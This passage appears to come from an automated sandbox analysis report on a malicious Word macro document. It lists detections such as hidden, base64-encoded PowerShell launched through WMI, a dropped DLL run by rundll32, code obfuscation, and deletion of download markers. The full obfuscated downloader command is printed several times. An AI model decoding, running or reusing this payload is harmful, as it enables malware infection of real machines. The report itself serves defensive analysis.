cAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
PE file contains an invalid checksum
Source: Yvtlx6p4.dll.5.dr Static PE information: real checksum: 0x4a297 should be: 0x40b13
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B0BD push ecx; ret 7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007BCA push ecx; ret 7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FCE92 push cs; retf 7_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019CE92 push cs; retf 9_2_0019CE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ACE92 push cs; retf 10_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001ECE92 push cs; retf 15_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001ECE92 push cs; retf 16_2_001ECE94

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Ocet\gyzufj.pjr Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ocet\gyzufj.pjr:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mylz\dnoauh.fda:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Skqv\bpgr.lft:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Eeay\tsbyty.hpi:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jfjk\etjwcl.eoy:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fpxy\zbyjv.xxd:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xcmo\muvihv.sjs:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
